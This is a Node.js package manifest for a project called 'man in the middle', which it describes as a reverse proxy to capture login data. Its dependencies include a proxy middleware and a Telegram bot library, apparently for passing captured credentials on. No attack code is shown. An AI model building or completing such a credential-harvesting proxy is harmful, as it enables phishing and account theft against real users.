{
  "name": "man in the middle",
  "version": "2.0.0",
  "description": "A reverse proxy to capture login data.",
  "main": "server.js",
  "scripts": {
    "start": "node server.js"
  },
  "dependencies": {
    "express": "^4.21.1",
    "http-proxy-middleware": "^3.0.2",
    "node-telegram-bot-api": "^0.66.0"
  }
}
